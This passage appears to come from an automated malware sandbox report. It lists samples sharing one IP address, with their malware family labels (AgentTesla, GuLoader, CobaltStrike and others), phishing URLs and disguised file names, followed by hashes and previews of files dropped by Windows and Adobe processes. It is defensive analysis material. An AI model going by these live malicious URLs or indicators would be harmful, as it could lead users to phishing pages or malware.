     | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | Get hash | malicious | HTMLPhisher | Browse | 5.188.88.146
     | https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08 | Get hash | malicious | HTMLPhisher | Browse | 5.188.88.146
     | 3z5nZg91qJ.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 5.188.88.146
     | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CxFHH8i5A3U7lzl-2BTzhlR6ei7mav1762I-2BKvT-2Fk6a5kJfjpj9RJPK9q48Ck5mSzSlgwV-2BsscO5sphM5t-2BVSr5yuCYcPokWOxF7VJFLVcuGxe55FXxdx2OWqy1uhpoEHKlprCsCZc7-2FzwTpK7gWkfISgE1dm3DNZag7jRcJoAY96XjRqTOiYZpVCYj4WczYZatXIFKlGImVUX-2BtzacIIXUkQ-3D-3Dxdxc_PRiWw-2BWerOwUL-2FYAA-2FiwxOm-2BJW3ubqhGFJ5iVqhmG217gfj9KgzNOSRNluvFvYbWIHUd-2ByAsKYpybXBhPgqT-2F1WfaNjyxdi-2FNqxuKfkiep8TocNXSydFj2bAYBLtB5MEDItgpH6g-2FV3171HTXrzYHtaSp7MB2B8WILdzxuyybTMsChhP3QdW9m4oU0X1zagLaXiyfnb7qkeR5CYT3FajfA-3D-3D | Get hash | malicious | Unknown | Browse | 5.188.88.146
     | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 5.188.88.146
     | Ziraat Bankasi Swift Mesaji.exe | Get hash | malicious | GuLoader | Browse | 5.188.88.146
    37f463bf4616ecd445d4a1937da06e19 | IF10339.pdf.lnk.mal.lnk | Get hash | malicious | Unknown | Browse | 5.188.88.146
     | Video%20HD%20%281080p%29.lnk.mal.lnk | Get hash | malicious | Unknown | Browse | 5.188.88.146
     | file.exe | Get hash | malicious | PureLog Stealer, Vidar | Browse | 5.188.88.146
     | 1Bj6BoXV3z.exe | Get hash | malicious | CobaltStrike | Browse | 5.188.88.146
     | pDHKarOK2v.exe | Get hash | malicious | CryptOne, Vidar | Browse | 5.188.88.146
     | Revised Invoice 7389293.vbs | Get hash | malicious | GuLoader, Remcos | Browse | 5.188.88.146
     | Vyuctovani_2024_07-1206812497#U00b7pdf.exe | Get hash | malicious | Remcos, GuLoader | Browse | 5.188.88.146
     | Build.exe | Get hash | malicious | DBatLoader, Neshta | Browse | 5.188.88.146
     | F.exe | Get hash | malicious | AsyncRAT, Neshta, XWorm | Browse | 5.188.88.146
     | 1719859269.0326595_setup.exe | Get hash | malicious | LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig | Browse | 5.188.88.146
                    No context
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1310720
                    Entropy (8bit):0.8022017747623389
                    Encrypted:false
                    SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAc:RJE+Lfki1GjHwU/+vVhWqpB
                    MD5:D4B9E99AEB6B53719A43EFAD2B77B278
                    SHA1:F1627A93A3E79D253D872EECA9018B020D72DE56
                    SHA-256:56F4AF664C36457F97FBF8A8DB0AF427B496349912CCB6D759380911C1B63119
                    SHA-512:28232FE794C3587C7B4FC3D3E9FE627B902DE4668C07424E6A6CCC69407BB2735A7F9170C79E58E8A0DD837CF988AA99F10258D726A7C7E130A380C261BAE4ED
                    Malicious:false
                    Reputation:low
                    Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                    Process:C:\Windows\System32\svchost.exe
                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x12d8488c, page size 16384, DirtyShutdown, Windows version 10.0
                    Category:dropped
                    Size (bytes):1048576
                    Entropy (8bit):0.9433228177600054
                    Encrypted:false
                    SSDEEP:1536:7SB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:7azaHvxXy2V2UR
                    MD5:B6B3296F945B555E07492434ED77B16A
                    SHA1:232383EAC55C92CDF121CA6C5C0C62D849B12681
                    SHA-256:1C136E61674DBCBED8BD16401D814EAF9B8276BA94D5F0BEF7188A183D181E7D
                    SHA-512:D7D8EAD1037CF90F4D36EA5AD521EFED540F53B5AEE2E76BDD6BDE888DEA2E69796DE9FD8027B089727356B3A7ACDF48A66F21D51AF49593E53BF462D2AF5629
                    Malicious:false
                    Reputation:low
                    Preview:..H.... ...............X\...;...{......................0.x...... ...{s../...|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..................................:..y./...|...................7U./...|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):0.08099323468159275
                    Encrypted:false
                    SSDEEP:3:jN8YeH7Wsl/nqlFcl1ZUlllly//llallGBnX/l/Tj/k7/t:+zHisl/qlFclQ/lMtA254
                    MD5:EA6CC3C13555976F6BC9921C31F2FFDD
                    SHA1:904416D0DE24D2CF00786DE47728FD1142B79BED
                    SHA-256:9F04BADB7CD5753E08D793397610778A3A540DB8D0C320CD2A842F68CA124B22
                    SHA-512:D97F285FB77A657B92DF6FEDC696D8E1B416762F58EB05D73ACDD70F89E462E3C4390B2959FB617EF8493CE3FE4C753BEDF6A66ED29DD14BB5977C5F889B9552
                    Malicious:false
                    Preview:$.U......................................;...{.../...|... ...{s.......... ...{s.. ...{s.P.... ...{s...................7U./...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.211007898514494
                    Encrypted:false
                    SSDEEP:6:BOAqVDM+q2PCHhJ2nKuAl9OmbnIFUt84OAeVgZmw+4OAeVDMVkwOCHhJ2nKuAl91:EA6M+vBHAahFUt81AT/+1AuMV56HAaSJ
                    MD5:749166A04034B8DDCFA6FF3189DF327D
                    SHA1:0720838C052AC6DF7CA39B065B7D95981C05100E
                    SHA-256:5145B185DF25F17FF5A7A31B152C6CD29F13387ECE379B0D06D3DBD2C408E42D
                    SHA-512:BB2A36F57F32D412B167E96AE873D2D09969EC53A72C981F369A9D7C16ED7D68043B0CF46612BB3DA71873D973C29835BE3395EB1154B46A5B175F357A609584
                    Malicious:false
                    Preview:2024/07/02-06:47:26.631 1cfc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/07/02-06:47:26.635 1cfc Recovering log #3.2024/07/02-06:47:26.635 1cfc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.211007898514494
                    Encrypted:false
                    SSDEEP:6:BOAqVDM+q2PCHhJ2nKuAl9OmbnIFUt84OAeVgZmw+4OAeVDMVkwOCHhJ2nKuAl91:EA6M+vBHAahFUt81AT/+1AuMV56HAaSJ
                    MD5:749166A04034B8DDCFA6FF3189DF327D
                    SHA1:0720838C052AC6DF7CA39B065B7D95981C05100E
                    SHA-256:5145B185DF25F17FF5A7A31B152C6CD29F13387ECE379B0D06D3DBD2C408E42D
                    SHA-512:BB2A36F57F32D412B167E96AE873D2D09969EC53A72C981F369A9D7C16ED7D68043B0CF46612BB3DA71873D973C29835BE3395EB1154B46A5B175F357A609584
                    Malicious:false
                    Preview:2024/07/02-06:47:26.631 1cfc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/07/02-06:47:26.635 1cfc Recovering log #3.2024/07/02-06:47:26.635 1cfc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):338
                    Entropy (8bit):5.179901915938386
                    Encrypted:false
                    SSDEEP:6:BOABAq2PCHhJ2nKuAl9Ombzo2jMGIFUt84OAimZmw+4OA6/kwOCHhJ2nKuAl9OmT:EAKvBHAa8uFUt81Aim/+1A6/56HAa8RJ
                    MD5:86E9E93D59D4CDBE591FA91D764A0264
                    SHA1:26F4316DFB67848C3BD3EADAE42EF56BDE401A75
                    SHA-256:AB51C6FFCD10064D28E05DA9BAC79D445AE5F80151252EC85C84434FC2949B8E
                    SHA-512:A16A378F2AD84DB0B63E8D5BD75933DF2C689178121D31C2A0DD19D4F85471D1AAF13600232B0A86BF7BA9FA9C8B1EFD677E7707572450F0C71214C6B5D1C663
                    Malicious:false
                    Preview:2024/07/02-06:47:26.786 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/07/02-06:47:26.788 1da0 Recovering log #3.2024/07/02-06:47:26.789 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):338
                    Entropy (8bit):5.179901915938386
                    Encrypted:false
                    SSDEEP:6:BOABAq2PCHhJ2nKuAl9Ombzo2jMGIFUt84OAimZmw+4OA6/kwOCHhJ2nKuAl9OmT:EAKvBHAa8uFUt81Aim/+1A6/56HAa8RJ
                    MD5:86E9E93D59D4CDBE591FA91D764A0264
                    SHA1:26F4316DFB67848C3BD3EADAE42EF56BDE401A75
                    SHA-256:AB51C6FFCD10064D28E05DA9BAC79D445AE5F80151252EC85C84434FC2949B8E
                    SHA-512:A16A378F2AD84DB0B63E8D5BD75933DF2C689178121D31C2A0DD19D4F85471D1AAF13600232B0A86BF7BA9FA9C8B1EFD677E7707572450F0C71214C6B5D1C663
                    Malicious:false
                    Preview:2024/07/02-06:47:26.786 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/07/02-06:47:26.788 1da0 Recovering log #3.2024/07/02-06:47:26.789 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):475
                    Entropy (8bit):4.976083759057505
                    Encrypted:false
                    SSDEEP:12:YH/um3RA8sqs5ChsBdOg2HdZcaq3QYiub6P7E4T3y:Y2sRdskydMHS3QYhbS7nby
                    MD5:3A6252E618FA24407CDEBE8118134E98
                    SHA1:DEB889916FFD91D6B1DC72062480F23FA882B38A
                    SHA-256:7F0F3DDFA854C7A893C311ABF5D23EF072829BD1EDCE5B4B2EC378887DD94018
                    SHA-512:03F4AF33735CE65530AC3C2B4A95966C0FEA22607F6955E35D35B0AA2A7A75FC256BE754B094A4346EA13F5F96BE714CDC5A7D58A6A7E2CFC80EDED71A8166B4
                    Malicious:false
                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13364477259320906","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144956},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:JSON data
                    Category:modified
                    Size (bytes):475
                    Entropy (8bit):4.976083759057505
                    Encrypted:false
                    SSDEEP:12:YH/um3RA8sqs5ChsBdOg2HdZcaq3QYiub6P7E4T3y:Y2sRdskydMHS3QYhbS7nby
                    MD5:3A6252E618FA24407CDEBE8118134E98
                    SHA1:DEB889916FFD91D6B1DC72062480F23FA882B38A
                    SHA-256:7F0F3DDFA854C7A893C311ABF5D23EF072829BD1EDCE5B4B2EC378887DD94018
                    SHA-512:03F4AF33735CE65530AC3C2B4A95966C0FEA22607F6955E35D35B0AA2A7A75FC256BE754B094A4346EA13F5F96BE714CDC5A7D58A6A7E2CFC80EDED71A8166B4
                    Malicious:false
                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13364477259320906","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144956},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.8","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):3878
                    Entropy (8bit):5.233646783549896
                    Encrypted:false
                    SSDEEP:96:S4bz5vsZ4CzSAsfTxiVud4TxY0CIOr3MCWO3VxBaw+bWteEDEq:S43C4mS7fFi0KFYDjr3LWO3V3aw+bWUY
                    MD5:22D3287FA6ECD677CAA340102909E7DB
                    SHA1:0262B7A985AAB20420B565737F37297D03E0E876
                    SHA-256:7EA29D48FDD6DD615B2F1BFBD53EA2FBDB8AA69E4D260609821F2FBA23F978F7
                    SHA-512:C85E6982F836F1FDACE7D2FCFE54F60A3684823F7DF19F236A223D64EF0E8160D44F4AAF713C2CD3501915D91441EA9A867C3ECC4A99F8752896AF50F538500E
                    Malicious:false
                    Preview:*...#................version.1..namespace-8..|o................next-map-id.1.Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/.0...dr................next-map-id.2.Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.2.$..o................next-map-id.4.Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/.3+...^...............Pnamespace-656dc224_0825_4dad_892f_a4fe9098071c-https://rna-resource.acrobat.com/....^...............Pnamespace-f0c0a73c_e89b_42d5_bb63_4f8a3b04cf3a-https://rna-resource.acrobat.com/T.3.a...............Snamespace-ef12e1ab_9f14_41d7_aae3_3f05adf09ebc-https://rna-v2-resource.acrobat.com/.U..a...............Snamespace-07eb38e9_046b_46c4_bd67_b1578df56145-https://rna-v2-resource.acrobat.com/.$..o................next-map-id.5.Pnamespace-c66013b9_73b6_4b3f_b279_
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):5.210687811998938
                    Encrypted:false
                    SSDEEP:6:BOAnq2PCHhJ2nKuAl9OmbzNMxIFUt84OA3rhZmw+4OA3r7kwOCHhJ2nKuAl9Ombg:EAnvBHAa8jFUt81A3N/+1A3/56HAa84J
                    MD5:9B04F95FBFA27232EBF4BA31A225866A
                    SHA1:2EBD57CB638AB07559B4FDA1C740DAB7A2404AB1
                    SHA-256:1F83DFC555F999D2D116EDF7C4DC138A37C005D17D6419AA0C1BE21FCF56FD3B
                    SHA-512:A9FF4382E767219290B898D1FD1109AEFB7DF8F0BA4AB2CD98A415F23AD210C058F964B2DF148649B0FDF3F6A824D854B1B351DCE48EB6A9A0CAA79226834748
                    Malicious:false
                    Preview:2024/07/02-06:47:26.859 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/07/02-06:47:26.861 1da0 Recovering log #3.2024/07/02-06:47:26.861 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):5.210687811998938
                    Encrypted:false
                    SSDEEP:6:BOAnq2PCHhJ2nKuAl9OmbzNMxIFUt84OA3rhZmw+4OA3r7kwOCHhJ2nKuAl9Ombg:EAnvBHAa8jFUt81A3N/+1A3/56HAa84J
                    MD5:9B04F95FBFA27232EBF4BA31A225866A
                    SHA1:2EBD57CB638AB07559B4FDA1C740DAB7A2404AB1
                    SHA-256:1F83DFC555F999D2D116EDF7C4DC138A37C005D17D6419AA0C1BE21FCF56FD3B
                    SHA-512:A9FF4382E767219290B898D1FD1109AEFB7DF8F0BA4AB2CD98A415F23AD210C058F964B2DF148649B0FDF3F6A824D854B1B351DCE48EB6A9A0CAA79226834748
                    Malicious:false
                    Preview:2024/07/02-06:47:26.859 1da0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/07/02-06:47:26.861 1da0 Recovering log #3.2024/07/02-06:47:26.861 1da0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                    Category:dropped
                    Size (bytes):71190
                    Entropy (8bit):1.1158673236880685
                    Encrypted:false
                    SSDEEP:96:3MxKbkIYqEEMMEEEe+EEEEEEJAiV+f1YkD1c:l4Ut1YkBc
                    MD5:5F1C6B6A1ED5670830EE47D67169BF1F
                    SHA1:3E4A6253B3A2AAF5DD27C40BE3A8501649A4818F
                    SHA-256:ED6184EACB792B64DEB1CDAC3506D92E7E14EAFEF9E36D51300B7627F417B97D
                    SHA-512:E962F1A0182D71676175A73E0A6302A93F71F6421772A9D069A2406991D0565E874AF23C7FE53C4B5624571DEEE36FDEC4AEF4C10F7AA67F180BAD857811AD3A
                    Malicious:false
                    Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Preview:0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):3.026467887142631
                    Encrypted:false
                    SSDEEP:3:kkFklIClfllXlE/E/KRkzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB8V7lnklc:kKduxliBAIdQZV7I7kc3
                    MD5:03B489A96548565DE6B4BFBA3CBB8681
                    SHA1:364BBE4D05D8A00E73713A2B1E7BE8311067F331
                    SHA-256:1F1427DD6CCAC9CCA95941A71E33D3393D69D006C7374F9EEE90D698FD2ECDCC
                    SHA-512:D22379557042C58922D8A9F3478E271971E9464BFC3D3BBFDC64920D9F544DBB914B46CD95F48A8C16C273044F8CDFC11E72CD52E0EC24C14DBE813D83CD6CF7
                    Malicious:false
                    Preview:p...... ....`....X<Bm...(....................................................... ........!.M........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.6.0.7.9.b.8.c.0.9.2.9.c.0."...
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):185099
                    Entropy (8bit):5.182478651346149
                    Encrypted:false
                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:PostScript document text
                    Category:dropped
                    Size (bytes):185099
                    Entropy (8bit):5.182478651346149
                    Encrypted:false
                    SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                    MD5:94185C5850C26B3C6FC24ABC385CDA58
                    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                    Malicious:false
                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):295
                    Entropy (8bit):5.329032302632101
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJM3g98kUwPeUkwRe9:YvXKXv9A2vR/ZwHA/GMbLUkee9
                    MD5:87BC35B2CA3B405A4F720A9F1C2C9EB4
                    SHA1:11A99A93A76AB14D9C64041406966E7B686D3ECA
                    SHA-256:548814C67D0DFD19370AB9AF497C1712EB06899131ED01EAB1E8962298AE8BD4
                    SHA-512:AFD9C4E69A92EE5E593F4B4DD5C755CA68C88AC673E373997EF9A88E754C1B757D60BC299446BBA2E7D533147FE7D29BCEFB913D4F55516B54652291C6951916
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.263711019805081
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfBoTfXpnrPeUkwRe9:YvXKXv9A2vR/ZwHA/GWTfXcUkee9
                    MD5:1A94A30E31DAFEE70BA1219E9FA980A7
                    SHA1:16EE39CCFEEC83940B2867109DFD95CF0A75138B
                    SHA-256:CA5E820FED17BE2D3198BE3FC3F82DCF717A4AFF60E0E7E25E00F2636E549EEF
                    SHA-512:051387EC3919F3F9E68FB90E759FEFB327F32A092C8A7217518EE6803FD3CA014A31E72F4A038FD8B7213BB75F21B87335164E0F78CCFB536A3D18B571A77145
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.24297881371975
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfBD2G6UpnrPeUkwRe9:YvXKXv9A2vR/ZwHA/GR22cUkee9
                    MD5:39E91972C2A81690ECA76AC338093289
                    SHA1:9AB3F55984CEA3C06EE54E4B1C46F2CD4E580596
